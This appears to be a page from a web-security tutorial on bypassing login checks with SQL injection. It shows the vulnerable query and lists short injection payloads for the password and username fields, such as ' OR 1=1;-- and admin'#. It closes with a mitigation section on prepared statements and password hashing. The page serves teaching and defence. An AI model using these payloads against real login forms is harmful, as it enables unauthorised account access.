Authentication Bypass

This method consists of considering that the web application isn't interested in the content of the username and password, but in making a matching pair in the users' table.

We assume the database uses a basic query for authentication

SELECT * from users WHERE username='%user%' and password='%password%' LIMIT 1;

%user% and %password% are the values received on a login form

We can do a malicious insertion on the password field

'--   #Use this comparison to cheat on verification
' OR 1=1;--   #Another alternative
'+OR+1=1-- #Another alternative
#This will skip the password verification and enumerate all the users

Sometimes, an extra space after ;-- could make it work

On PHP-based pages, we can replicate the same with a different payload

admin'#      //Insert this to skip the password verification

Mitigation

It's correct to use prepared statements to force the database to treat user input as data, not executable code, so these kinds of payloads become harmless strings. For example:

Example_PHP_Implementation

$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->execute([$username, $password]);
$user = $stmt->fetch();

Also, we should never store passwords in plaintext and compare them in the same way. She should store password hashes using algorithms like bcrypt/argon2 and verify them server-side.

PreviousSQL Injection NextNoSQL Injection

Last updated 1 day ago